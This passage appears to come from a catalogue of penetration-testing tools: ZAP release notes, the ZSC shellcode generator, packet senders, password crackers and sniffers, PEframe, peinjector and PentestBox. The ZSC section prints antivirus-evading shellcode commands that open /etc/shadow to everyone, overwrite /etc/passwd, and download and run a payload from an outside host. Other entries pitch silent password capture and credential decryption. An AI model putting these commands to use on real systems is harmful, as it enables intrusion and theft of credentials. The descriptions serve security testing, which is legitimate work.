defined Confidence field (False Positive, Low, Medium,
High, or Confirmed).
Timestamps are now optionally available for the output
tab.
EXTENDED API SUPPORT
The API now supports the spidering and active scanning or

multiple targets concurrently, the management of scan policies
as well as even more of the ZAP functionality.
INTERNATIONALIZED HELP ADD-ONS
The help files are internationalized via https://crowdin.net/

project/owasp-zap-help.
If you use ZAP in one of the many languages we support, then
look on the ZAP Marketplace to see if the help files for that
language are available. These will include all of the available
translations for that language while defaulting back to English
for phrases that have not yet been translated.
RELEASE NOTES
See the Release Notes (https://code.google.com/p/zaproxy/

wiki/HelpReleases2_4_0) for a full list of all of the changes
included in this release.
Download ZAP 2.4.0

OWASP ZAP 2.4.1 - PENETRATION TESTING TOOL FOR
TESTING WEB APPLICATIONS
The OWASP Zed Attack Proxy (ZAP) is an easy to use

integrated penetration testing tool for finding vulnerabilities in
web applications.
It is designed to be used by people with a wide range of
security experience and as such is ideal for developers and
functional testers who are new to penetration testing as well as
being a useful addition to an experienced pen testers toolbox.
Release 2.4.1
This release includes important security fixes - users are urged

to upgrade asap.
One of the changes means that an API key is created by
default, which means that any applications using the ZAP API
will fail unless they are updated to use that key. The API Key
can be found in the API Options screen You can also set it from
the command line using an option like:
-config api.key=change-me-9203935709
For more details see https://github.com/zaproxy/zaproxy/wiki/

FAQapikey
The following changes were made in this release:
Enhancements:
Issue 321 : Support multiple databases
Issue 1459 : Add an HTTP sender listener script
Issue 1500 : Update Bouncy Castle libs
Issue 1566 : Improve active scan's reported progress
Issue 1573 : Add option to inject plugin ID in header for all
ascan requests
Issue 1607 : Unable to save the test session via API
Issue 1621 : AScan API - Allow to scan as an user
Issue 1625 : Support multiple structural params and ones
on top level nodes
Issue 1653 : Support context menu key for trees
Issue 1655 : Copy Session Token from Http Sessions tab
to clipboard
Issue 1662 : Add default Rails anti-CSRF token parameter
Issue 1664 : Clients tab autoscroll
Issue 1684 : Unable to set technology via API
Issue 1688 : Updating owasp/zap2docker image with
Python Client API
Issue 1690 : Bump key pair size to 2048 for all certs in the
(proxy's) chain of trust
Issue 1695 : Change SSL cert signature algorithm to

"SHA-256 with RSA Encryption"
Issue 1699 : Allow ApiImplementor's to add custom
headers
Issue 1715 : Unable to pass arguments when launching
ZAP from the command line on Mac OS X
Issue 1728 : Update JRE to 1.7u79 (CPU) for MacOS
Bug fixes:
Issue
444
:
Guaranteed
NPE
on
AliasCertificate.getName() if getCN()==null
Issue 1442 : Up/Down arrow keys in results stop working if
"reflected"
Issue 1473 : Spider does not handle URLs extracted from
meta tags correctly
Issue 1497 : The spider is extracting and reporting links
from comments - event when instructed not to do so
Issue 1598 : startup script lacks support for FreeBSD
Issue 1615 : Search "All" option not working
Issue 1617 : ZAP 2.4.0 throws HeadlessExceptions when
running in daemon mode on headless machine
Issue 1618 : Target Technology Not Honored
Issue 1619 : Search regex might not be validated
Issue 1624 : Error while loading ZAP 2.4.0
Issue 1626 : Structural parameters not saved when
context exported and not available via the API
Issue 1636 : Users (for auth) & Forced User not loaded
from session
Issue 1647 : Wrong reference in Zest Result
Issue 1674 : Ajax spider not considering get parameters
Issue 1677 : Fuzzers can't be expanded on OS X
Issue 1694 : "Error: setting file is missing. Program will
exit." even if file exists
Issue 1698 : Escape API exceptions
Issue 1700 : Forced Browse Lists Missing from DropDown in 2.4.0
Issue 1706 : Add API security options

Issue 1708 : Context's technology tree can get out of sync
Issue 1709 : Applications are not (immediately) shown
after start
Issue 1714 : PNH should not reflect API key unless user
supplies it
Issue 1716 : Restrict use of CORS header in pnh
Issue 1720 : Add more security options for JSONP API
Issue 1724 : Ensure API component names are escaped
in the HTML output
Issue 1735 : Context's technologies not used in active
scan unless overridden
DownloadOWASP ZAP 2.4.1

OWASP ZSC SHELLCODER - GENERATE CUSTOMIZED
SHELLCODES
OWASP ZSC is an open source software in python language

which lets you generate customized shellcodes for listed
operation systems. This software can be run on Windows/
Linux&Unix/OSX and others OS under python 2.7.x.
Description
Usage of shellcodes
Shellcodesare small codes in assembly which could be use as
the payload in software exploiting. Other usages are in
malwares, bypassing antiviruses, obfuscated codes and etc.
Why use OWASP ZSC?
According to other shellcode generators same as metasploit

tools and etc, OWASP ZSC using new encodes and methods
which antiviruses won't detect. OWASP ZSC encoderes are
able to generate shellcodes with random encodes and that's
lets you to get thousands new dynamic shellcodes with
same job in just a second,that means you will not get a same
code if you use random encodes with same commands, And
that make OWASP ZSC one of the bests! otherwise it's gonna
generate shellcodes for many operation systems in next
versions.
Help Menu
Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist
=> list os for switch -os
-o => output filename

-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-wizard => wizard mod
-update => check for update
-about => about software and developers.
With these switch you can see the oslist,encode types and
functions [joblist] to generate your shellcode.
OS List "-oslist"
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64
Encode Types "-types"

[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all
Functions "-joblist"
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to
execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of
your script in your pc','execute command')
Now you are able to choose your operation system, function,

and encode to generate your shellcode, But all of these
features are not activated yet, so you have to look up this table
HERE to see what features are activated.
For example, this part of table telling us all functions for

linux_x86 is activated, But Encodes [xor_random,
xor_yourvalue, add_random, add_yourvalue, sub_random,
sub_yourvalue, inc, inc_timesyouwant, dec, dec_timesyouwant]
are just activated for chmod() function.
Examples
>zsc -os linux_x86 -encode inc -job "chmod('/etc/
passwd','777')" -o file
>zsc -os linux_x86 -encode dec -job "chmod('/etc/
>zsc -os linux_x86 -encode inc_10 -job "chmod('/etc/
>zsc -os linux_x86 -encode dec_30 -job "chmod('/etc/
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/
shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/
passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/
etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/
etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/
>zsc -os linux_x86 -encode none -job "file_create('/root/
Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/
Desktop/hello2.txt','hello[space]world[space]!')" -o
file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/
Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://
www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job
"download_execute('http://www.z3r0d4y.com/
exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
"download_execute('http://www.z3r0d4y.com/
exploit.type','myfile.type','chmod[space]777[space]myfile
.type;sh[space]myfile.type')" -o file.txt
"script_executor('script.type','D:\\myfile.type','./
script.type')" -o file.txt
"script_executor('z3r0d4y.sh','/root/
z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
"script_executor('ali.py','/root/Desktop/
0day.py','chmod[space]+x[space]ali.py;
[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o
file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]la[space]/etc/shadow;chmod[space]777[space]/etc/
shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/
shadow;wget[space]file[space];chmod[space]777[space]file;
./file')" -o file.txt
"system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/
shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/
passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')"
-o file.txt
Note: Dont use space in system() function, replace it with

[space] , software will detect and replace for you in
shellcode.
N
o
t
e
:
script_executor(),download_execute(),download(),dir_create(),fi
le_create() are using linux command line , not the function.
[wget,mkdir,echo] system() function added in script, you can
use it to do anything and generate any command line
shellcode.
Note: exec() doesnt support any ARGV same as exec(/bin/
bash -c ls) or exec(/bin/bash,-c,ls), you have to wait for next
version and this feature will available in system()
Note: you also can use high value for inc and dec time, like
inc_100000, your shellcode may get too big
Note: each time you execute chmod()[or any other] function
with random encode, you are gonna get random outputs and
different shellcode.
Note: your xor value could be anything. xor_0x41414141 and
xor_0x45872f4d are examples.
Wizard Switch
With -wizard switch you are able to generate shellcode without
long ARGVs, software will ask you for information.
Note: While you are using -wizard switch, if you push Enter
without typing anything, the default value will be set on the
varible.
Note: With entering list, List of values will be shown.
Available Features
add length calculator for output

add filename writer in gcc commandline in output file
fixed bug in encoding module not available.
fixed bug in os module not available
add -wizard switch
add installer use zsc commandline in terminal after
installed
add uninstaller
This Software just could be run on linux since this version
change output to .c file and automated shellcode
generating
add color output for termina
add inc encoding chmod() [linux_x86]
add inc_timesyouwant chmod() [linux_x86]
add dec encoding chmod() [linux_x86]

add dec_timesyouwant chmod() [linux_x86]
add features table inside features_table.html
add -about to menu for developers name and etc
fixed permission number calculating in chmod()
[linux_x86]
softwares signature changes
bug fix reported by user in executing on linux , color
function
add xor_random encoding chmod() [linux_x86]
add xor_yourvalue encoding chmod() [linux_x86]
add add_random encoding chmod() [linux_x86]
add add_yourvalue encoding chmod() [linux_x86]
add sub_random encoding chmod() [linux_x86]
add sub_yourvalue encoding chmod() [linux_x86]
fixed shellcode encode type checking
[linux_x86 modules completed]
add script_executor() [linux - using command execution]
add download_execute() [linux_x86 - using command
execution (wget)]
add download() [linux_x86 - using command execution
(wget)]
add dir_create() [linux_x86 using command execution]
add file_create() [linux_x86 using command execution]
add encodes file for next version released
add system() [linux_x86 command execute]
fixed chmod filename char length [linux_x86]
fixed exec filename char length [linux_x86]
fixed write filename length [linux_x86]
fixed write content length [linux_x86]
fixed write length calculator [linux_x86]
and fixed some other bugs in coding [core]
system() function added in script, you can use it to do
anything and generate any command line shellcode.
add chmod() [linux_x86] -> chmod(/path/file,perm_num)
add write() [linux_x86] -> write(/path/file,content)
add exec() [linux_x86] -> exec(/path/file)

add encode [none - all os]
add mix_all encoding in chmod() [linux_x86]
add xor_random encoding in system() [linux_x86]
add xor_yourvalue encoding in system() [linux_x86]
add add_random encoding in system() [linux_x86]
add add_yourvalue encoding in system() [linux_x86]
add sub_random encoding in system() [linux_x86
add sub_yourvalue encoding in system() [linux_x86]
add inc encoding in system() [linux_x86]
add inc_timesyouwant encoding in system() [linux_x86
add dec encoding in system() [linux_x86]
add dec_timesyouwant encoding in system() [linux_x86]
add mix_all encoding in system() [linux_x86]
add xor_random encoding in file_create() [linux_x86]
add xor_yourvalue encoding in file_create() [linux_x86]
add add_random encoding in file_create() [linux_x86]
add add_yourvalue encoding in file_create() [linux_x86]
add sub_random encoding in file_create() [linux_x86
add sub_yourvalue encoding in file_create() [linux_x86]
add inc encoding in file_create() [linux_x86]
add inc_timesyouwant encoding in file_create() [linux_x86
add dec encoding in file_create() [linux_x86]
add dec_timesyouwant encoding in file_create()
[linux_x86]
add mix_all encoding in file_create() [linux_x86]
add xor_random encoding in dir_create() [linux_x86]
add xor_yourvalue encoding in dir_create() [linux_x86]
add add_random encoding in dir_create() [linux_x86]
add add_yourvalue encoding in dir_create() [linux_x86]
add sub_random encoding in dir_create() [linux_x86
add sub_yourvalue encoding in dir_create() [linux_x86]
add inc encoding in dir_create() [linux_x86]
add inc_timesyouwant encoding in dir_create() [linux_x86
add dec encoding in dir_create() [linux_x86]
add dec_timesyouwant encoding in dir_create()
[linux_x86]
add mix_all encoding in dir_create() [linux_x86]
add xor_random encoding in download() [linux_x86]
add xor_yourvalue encoding in download() [linux_x86]
add add_random encoding in download() [linux_x86]
add add_yourvalue encoding in download() [linux_x86]
add sub_random encoding in download() [linux_x86
add sub_yourvalue encoding in download() [linux_x86]
add inc encoding in download() [linux_x86]
add inc_timesyouwant encoding in download() [linux_x86
add dec encoding in download() [linux_x86]
add dec_timesyouwant encoding in download() [linux_x86]
add mix_all encoding in download() [linux_x86]
add xor_random encoding in download_execute()
[linux_x86]
add xor_yourvalue encoding in download_execute()
[linux_x86]
add add_random encoding in download_execute()
[linux_x86]
add add_yourvalue encoding in download_execute()
[linux_x86]
add sub_random encoding in download_execute()
[linux_x86
add sub_yourvalue encoding in download_execute()
[linux_x86]
add inc encoding in download_execute() [linux_x86]
add inc_timesyouwant encoding in download_execute()
[linux_x86
add dec encoding in download_execute() [linux_x86]
add dec_timesyouwant encoding in download_execute()
[linux_x86]
add mix_all encoding in download_execute() [linux_x86]
add xor_random encoding in system() [linux_x86]
add xor_yourvalue encoding in system() [linux_x86]
add add_random encoding in system() [linux_x86]
add add_yourvalue encoding in system() [linux_x86]
add sub_random encoding in system() [linux_x86

add sub_yourvalue encoding in system() [linux_x86]
add inc encoding in system() [linux_x86]
add inc_timesyouwant encoding in system() [linux_x86
add dec encoding in system() [linux_x86]
add dec_timesyouwant encoding in system() [linux_x86]
add mix_all encoding in system() [linux_x86]
add xor_random encoding in script_executor() [linux_x86]
add xor_yourvalue encoding in script_executor()
[linux_x86]
add add_random encoding in script_executor() [linux_x86]
add add_yourvalue encoding in script_executor()
[linux_x86]
add sub_random encoding in script_executor() [linux_x86
add sub_yourvalue encoding in script_executor()
[linux_x86]
add inc encoding in script_executor() [linux_x86]
add inc_timesyouwant encoding in script_executor()
[linux_x86
add dec encoding in script_executor() [linux_x86]
add dec_timesyouwant encoding in script_executor()
[linux_x86]
add mix_all encoding in script_executor() [linux_x86]
add add_random encoding in write() [linux_x86]
add xor_random encoding in write() [linux_x86]
add sub_random encoding in write() [linux_x86]
add xor_random encoding in exec() [linux_x86]
add sub_random encoding in exec() [linux_x86
add add_random encoding in exec() [linux_x86]
fixed bug in system() when len(command) is less than 5
fixed bug in encode module add_random chmod()
[linux_x86]
DownloadOWASP ZSC
PACKET SENDER - THE UDP AND TCP NETWORK TEST
UTILITY
Packet Sender is an open source utility to allow sending and

receiving TCP and UDP packets. It is available free (no ads /
no bundleware) for Windows, Mac, and Linux. It can be used
for both commercial and personal use (license). It's designed to
be very easy to use while still providing enough features for
power users to do what they need.
Mobile
The native mobile versions have been abandoned to focus on

the more popular and more capable desktop version. However,
the GitHub projects for both iOSand Android are MIT
Licensed and available for forking.
Change log
Version 2015-04-19
Portable mode
Read in file from command line
Save traffic log
Mobile versions have been abandoned. Project focus
is now on the far more popular desktop version.
Version 2015-02-13
Migrated to GitHub
New vector-based logo
Bug fix in quick-disable/enable
Migrated to Qt 5.4
Ubuntu version brought up to date.
Forums are closed (spammers killed it).
Version 2014-10-07
Initial launch of forums.
Multi-Send.
Quick-send from traffic log selected packets.
Packet Export/Import.
Rolling traffic log support.
Numerous configuration settings added:
Copy raw packet data to clipboard.
Receive before send.
Connection delays for slow devices.
Command line interface default binds to 0.
Universal (XP through 8.1) Windows installer.
Migrated to Qt 5.3
Some rework of the "About" section.
Version 2014-02-22
TCP connections are now fully threaded (no more UI
freezes).
Brand new and highly capable command line
interface. (Run PacketSender --help)
Some mild UI enhancements to make sending
easier.
Ubuntu version brought up to date.

Windows XP now separated.
Qt 5.2
Version 1.5 (Mobile)
Android version released.
Version 2013-11-18
Copy to Clipboard button on traffic log.
Name prompt for traffic log.
Version 2013-11-11
Bad installer on Windows. No other changes made.
Version 2013-11-09
Searching packets from traffic log.
Fixed some traffic log stability problems.
Version 2013-11-05
Added resending packets at user-specified intervals.
Traffic log sped up significantly.
Packet searching.
Table headers (both saved packets and traffic log)
can be rearranged.
Response packet for TCP actually works now.
Response packet data can be manually updated.
About / License stuff moved to another tab.
Internal libraries updated.
Version 2013-10-20
64-bit Ubuntu and Linux Mint support.
Version 2013-10-14
Ubuntu and Linux Mint support.
Version 2013-05-20
Saving is less quirky.
Domain names can be used in IP address line.
Packet Sender will do a quick lookup to find the IP.
Internal libraries updated.
Version 2012-09-12
Public release of deskop version.
DownloadPacket Sender
PACKETH - ETHERNET PACKET GENERATOR
PackETH is GUI and CLI packet generator tool for ethernet. It

allows you to create and send any possible packet or sequence
of packets on the ethernet link. It is very simple to use, powerful
and supports many adjustments of parameters while sending
sequence of packets. And lastly, it has the most beautiful web
site of all the packet generators.
Features
you can create and send any ethernet packet. Supported

protocols:
ethernet II, ethernet 802.3, 802.1q, QinQ, user
defined ethernet frame
ARP, IPv4, IPv6, user defined network layer payload
UDP, TCP, ICMP, ICMPv6, IGMP, user defined
transport layer payload
RTP (payload with options to send sin wave of any
frequency for G.711)
JUMBO frames (if network driver supports it)
sending sequence of packets
delay between packets, number of packets to send
sending with max speed, approaching the theoretical
boundary
change parameters while sending (change IP & mac
address, UDP payload, 2 user defined bytes, etc.)
saving configuration to a file and load from it - pcap format
supported
DownloadPackETH
PASSGEN - RANDOM CHARACTER GENERATOR CRUNCH
TO CRACK WPA/WPA2
Passgen is an alternative for the random character generator

crunch which attempts to solve cracking WPA/WPA2 keys by
randomizing the output opposed to generating a list like so,
(aaaaaaaa, aaaaaaab, aaaaaac, etc).
Example usuage with aircrack-ng
python passgen.py -l | sudo aircrack-ng --bssid
00:11:22:33:44:55 -w- WiFi.cap)
Argument switches are as followed:

-l lowercase ascii
-l1 lowercase ascii + digits(0-9)
-U uppercase ascii
-U1 uppercase ascii + digits
-lU lowercase + uppercase ascii
-lU1 lowercase + uppercase ascii + digits
-C [char] [length] custom character set + length
Download Passgen
PASSWORD CRACKING SUITE
How To Use It:
git clone https://github.com/TecnoHack/PasswordCracking-Suite.git

chmod +x csuit.py
./csuit.py
Dics Path:
In this path, you can add any dictionary you would like to use.
Tools Path:
In this path, the script will install 3rd party tools. You can
download some here:
http://www.moehre.org/bruteforce.html
http://cyberwarzone.com/cyberwarfare/password-crackingmega-collection-password-cracking-word-lists
http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html
Tools used by the script:
Hash-Indentifier --> https://code.google.com/p/hashidentifier/

Findmyhash --> https://code.google.com/p/findmyhash/
John The Ripper --> http://www.openwall.com/john/
Crunch --> http://sourceforge.net/projects/crunch-wordlist/
Availible Hash Types:

afs bf bfegg bsdi crc32 crypt
des django dmd5 dominosec dragonfly3-32 dragonfly3-64
dragonfly4-32 dragonfly4-64 drupal7 dummy dynamic_n
epi episerver gost hdaa hmac-md5 hmac-sha1
hmac-sha224 hmac-sha256 hmac-sha384 hmac-sha512
hmailserver ipb2 keepass keychain krb4 krb5 lm lotus5
md4-gen md5 md5ns mediawiki mscash mscash2 mschapv2

mskrb5 mssql mssql05 mysql mysql-sha1 nethalflm netlm
netlmv2 netntlm netntlmv2 nsldap nt nt2 odf office
oracle oracle11 osc pdf phpass phps pix-md5 pkzip po
pwsafe racf rar raw-md4 raw-md5 raw-md5u raw-sha
raw-sha1 raw-sha1-linkedin raw-sha1-ng raw-sha224
raw-sha256 raw-sha384 raw-sha512 salted-sha1 sapb
sapg sha1-gen sha256crypt sha512crypt sip ssh
sybasease trip vnc wbb3 wpapsk xsha xsha512 zip
Download Password Cracking Suite

PASSWORD SNIFFER CONSOLE - COMMAND-LINE TOOL
TO SNIFF AND CAPTURE HTTP/FTP/POP3/SMTP/IMAP
PASSWORDS
Password Sniffer Console is the all-in-one command-line

based Password Sniffing Tool to capture Email, Web and FTP
login passwords passing through the network.
It automatically detects the login packets on network for various
protocols and instantly decodes the passwords.
Here is the list of supported protocols,
HTTP (BASIC authentication)
FTP
POP3
IMAP
SMTP
In addition to recovering your own lost passwords, you can use

this tool in following scenarios,
Run it on Gateway System where all of your network's

traffic pass through.
In MITM Attack, run it on middle system to capture the

Passwords from target system.
On Multi-user System, run it under Administrator account

to silently capture passwords for all the users.
It includes Installer which installs the Winpcap, network

capture driver required for sniffing. For Windows 8, first you
have to manually install Winpcap driver (in Windows 7
Compatibility mode) and then run our installer to install only
Password Sniffer Console.

It is a very useful tool for penetration testers and being a
command-line tool makes it suitable for automation.
It works on both 32-bit & 64-bit platforms starting from Windows
XP to Windows 8.
Requirements
PasswordSnifferConsole requires Winpcap (http://

www.winpcap.org) - industry standard packet capture library for
Windows. By default latest version of Winpcap (as of this
writing v4.1.2) is installed automatically during the installation of
Password Sniffer Console.
However if you don't want it, you can uncheck it during
installation and later install the latest version manually.
DownloadPassword Sniffer Console

PEFRAME - TOOL TO PERFORM STATIC ANALYSIS ON
PORTABLE EXECUTABLE MALWARE
PEframe is a open source tool to perform static analysis on
Portable Executable malware.
Usage
$ peframe malware.exe
$ peframe [--option] malware.exe
Options
--json
Output in json
--import
Imported function and dll
--export
Exported function and dll
--dir-import
Import directory
--dir-export
Export directory
--dir-resource Resource directory

--dir-debug
Debug directory
--dir-tls
TLS directory
--strings
Get all strings
--sections
Sections information
--dump
Dump all information
Install
Prerequisites
Python 2.6.5 -> 2.7.x
Install
from pypi
# pip install https://github.com/guelfoweb/peframe/
archive/master.zip
from git
$ git clone https://github.com/guelfoweb/peframe.git
$ cd peframe
# python setup.py install
Example
$ peframe malware.exe
Short information
-----------------------------------------------------------
File Name
malware.exe
File Size
935281 byte
Compile Time
2012-01-29 22:32:28
DLL
False
Sections
Hash MD5
cae18bdb8e9ef082816615e033d2d85b
Hash SAH1
546060ad10a766e0ecce1feb613766a340e875c0
Imphash
353cf96592db561b5ab4e408464ac6ae
Detected
Xor, Sign, Packer, Anti Debug, Anti VM
Directory
Import, Resource, Debug, Relocation,
Security
XOR discovered
----------------------------------------------------------Key length
Offset (hex)
Offset (dec)
0x5df4e
384846
0x5df4e
384846
0x5df4e
384846
0x5df4e
384846
Digital Signature
----------------------------------------------------------Virtual Address
12A200
Block Size
4813 byte
Hash MD5
63b8c4daec26c6c074ca5977f067c21e
Hash SHA-1
53731a283d0c251f7c06f6d7d423124689873c62
Packer matched [4]

----------------------------------------------------------Packer
Microsoft Visual C++ v6.0
Packer
Microsoft Visual C++ 5.0
Packer
Microsoft Visual C++
Packer
Installer VISE Custom
Anti Debug discovered [9]

----------------------------------------------------------Anti Debug
FindWindowExW
Anti Debug
FindWindowW
Anti Debug
GetWindowThreadProcessId
Anti Debug
IsDebuggerPresent
Anti Debug
OutputDebugStringW
Anti Debug
Process32FirstW
Anti Debug
Process32NextW
Anti Debug
TerminateProcess
Anti Debug
UnhandledExceptionFilter
Anti VM Trick discovered [2]

----------------------------------------------------------Trick
Virtual Box
Trick
VMware trick
Suspicious API discovered [35]

---------------------------------------------------------
--Function
CreateDirectoryA
Function
CreateFileA
Function
CreateFileMappingA
Function
CreateToolhelp32Snapshot
Function
DeleteFileA
Function
FindFirstFileA
Function
FindNextFileA
Function
GetCurrentProcess
Function
GetFileAttributesA
Function
GetFileSize
Function
GetModuleHandleA
Function
GetProcAddress
Function
GetTempPathA
Function
GetTickCount
Function
GetUserNameA
Function
GetVersionExA
Function
InternetCrackUrlA
Function
LoadLibraryA
Function
MapViewOfFile
Function
OpenProcess
Function
Process32First
Function
Process32Next
Function
RegCloseKey
Function
RegCreateKeyA
Function
RegEnumKeyExA
Function
RegOpenKeyA
Function
RegOpenKeyExA
Function
Sleep
Function
WSAStartup
Function
WriteFile
Function
closesocket
Function
connect
Function
recv
Function
send
Function
socket
Suspicious Sections discovered [2]

----------------------------------------------------------Section
.data
Hash MD5
b896a2c4b2be73b89e96823c1ed68f9c
Hash SHA-1
523d58892f0375c77e5e1b6f462005ae06cdd0d8
Section
.rdata
Hash MD5
41795b402636cb13e2dbbbec031dbb1a
Hash SHA-1
b674141b34f843d54865a399edfca44c3757df59
File name discovered [43]
----------------------------------------------------------Binary
wiseftpsrvs.bin
Data
ESTdb2.dat
Data
Favorites.dat
Data
History.dat
Data
bookmark.dat
Data
fireFTPsites.dat
Data
quick.dat
Data
site.dat
Data
sites.dat
Database
FTPList.db
Database
sites.db
Database
NovaFTP.db
Executable
unleap.exe
Executable
explorer.exe
FTP Config
FTPVoyager.ftp
Library
crypt32.dll
Library
kernel32.dll
Library
mozsqlite3.dll
Library
userenv.dll
Library
wand.dat
Library
wininet.dll
Library
wsock32.dll
Text
Connections.txt
Text
ftplist.txt
Text
signons.txt
Text
signons2.txt
Text
signons3.txt
Url discovered [2]

----------------------------------------------------------Url
RhinoSoft.com
Url
http://0uk.net/zaaqw/gate.php
Meta data found [4]

----------------------------------------------------------CompiledScript
AutoIt v3 Script
FileVersion
3, 3, 8, 1
FileDescription
Translation
0x0809 0x04b0
DownloadPEframe
PEINJECTOR - MITM PE FILE INFECTOR
The executable file format on the Windows platform is PE

COFF. The peinjector provides different ways to infect these
files with custom payloads without changing the original
functionality. It creates patches, which are then applied
seamlessly during file transfer. It is very performant,
lightweight, modular and can be operated on embedded

hardware.
Features
Full x86 and x64 PE file support.

Open Source
Fully working on Windows and Linux, including automated
installation scripts.
Can be operated on embedded hardware, tested on a
Rasperberry Pi 2.
On Linux, all servers will be automatically integrated as
service, no manual configuration required.
Plain C, no external libraries required (peinjector).
MITM integration is available in C, Python and Java. A
sample Python MITM implementation is included.
Foolproof, mobile-ready web interface. Anyone who can
configure a home router can configure the injector server.
Easy to use integrated shellcode factory, including reverse
shells, meterpreter, ... or own shellcode. Everything is
available in 32 and 64 bit with optional automated
encryption. Custom shellcode can be injected directly or
as a new thread.
An awesome about page and much more, check it out.
DownloadPEInjector
PEMCRACKER - TOOL TO CRACK ENCRYPTED PEM
FILES
This tool is inspired by pemcrack by Robert Graham. The

purpose is to attempt to recover the password for encrypted
PEM files while utilizing all the CPU cores.
It still uses high level OpenSSL calls in order to guess the
password. As an optimization, instead of continually checking
against the PEM on disk, it is loaded into memory in each
thread.
bwall@ragnarok:~$ ./pemcracker
pemcracker 0.1.0
pemcracker <path to pem> <word file>
pemcracker 0.1.0 by Brian Wallace (@botnet_hunter)
Usage Example
bwall@ragnarok:~/data/publicprojects/pemcracker$ ./
pemcracker test.pem test.dict
Password is komodia for test.pem
Compiling
make
This is somewhat of a short side project, so my apologies for

any issues. If there is desire for this project to be further
developed, I will try to allocate time.
Alternatives
If you are looking for the fastest possible method of brute

forcing PEM files, you may wish to try out John the Ripper. Its
little known ssh2john allows for converting PEM files to a format
that can be fed into ./john. Details
Download Pemcracker
PENTESTBOX - PORTABLE PENETRATION TESTING
DISTRIBUTION FOR WINDOWS ENVIRONMENTS
PentestBox is not like other Penetration Testing Distributions
which runs on virtual machines. It is created because more

than 50% of penetration testing distributions users uses
windows.
So it provides an efficient platform for Penetration Testing on
windows platform.
Check out demo video:
PentestBox Demo
from Pentest Box

Play
Easy To Use
It is a commandline utility which is all what you want.

Awesome Design
It is the same green font on black terminal but in an modern

way. I am pretty sure you will like it.
Best Performance
PentestBox directly runs on host machine instead of virtual

machines, so performance is obvious.
No Dependencies Needed
All the dependencies required by tools are inside PentestBox,

so you can even run PentestBox on freshly installed windows
without any hassle.
Portable
PentestBox is entirely portbale, so now you can carry your own

Penetration Testing Environment on a USB stick. It will take
care of dependencies required to run tools which are inside it.
Linux Environment
PentestBox contains nearly all linux utilities like bash, cat,

chmod, curl, git, gzip, ls, mv, ps, ssh, sh, uname and others.
Tools category
Web Vulnerability Scanners

Web Applications Proxies
Web Crawlers
Information Gathering
Exploitation Tools
Password Attacks
Android Security
Reverse Engineering
Stress Testing
Sniffing
Forensic Tools
Wireless Attacks
Text Editors
Linux Utilities
How to include your own Tool
If you want to include a tool which is not currently present in

PentestBox then below are the ways to include it.
If it is Python based program
Place that folder in PentestBox_Directory/bin or in
any folder inside bin.
As Python is configured inside PentestBox, you can
directly go to that directory and then run that program
by prepending python to the filename.
But if you want to set an alias for that program then
please follow How to add an alias
If it is Ruby Based Program
As Ruby is configured inside PentestBox, you can
directly go to that directory and then run that program
by prepending ruby to the filename.

It it is Executable file
You can directly access by moving to that folder and
typing the filename.
DownloadPentestBox
PENTESTPACKAGE - A PACKAGE OF MULTIPLE
PENTEST SCRIPTS
CONTENTS:
Wordlists - Comprises of password lists, username lists

and subdomains
Web Service finder - Finds web services of a list of IPs
and also returns any URL rewrites
Gpprefdecrypt.* - Decrypt the password of local users

added via Windows 2008 Group Policy Preferences.
rdns.sh - Runs through a file of line seperated IPs and
prints if there is a reverse DNS set or not.
grouppolicypwn.sh - Enter domain user creds (doesnt
need to be priv) and wil lcommunicated with the domain
controllers and pull any stored CPASS from group policies
and decode to plain text. Useful for instant Domain Admin!
privchecker.sh - Very young script that simply checks
DCenum to a list of users to find their group access,
indicated any privilaged users, this list can be edited.
NessusParserSummary.py - Parses Nessus results to
give a summary breakdown of findings plus a host count
next to each.
NessusParserBreakdown.py- Parses Nessus results to
give a host based breakdown of findings plus the
port(protocol) and CVSS rating.
NmapParser.py - Parses raw NMAP results (or .nmap)
and will create individual .csv files for each host with a
breakdown of ports, service version, protocol and port
status.
NmapPortCount.py - Parses raw NMAP results
(or .nmap) and will generate a single CSV with a list of
Hosts, a count of how many open/closed/filtered ports it
has, the OS detection and ICMP response.
Plesk-creds-gatherer.sh - Used on older versions of
plesk (before the encription came in) that allows you to
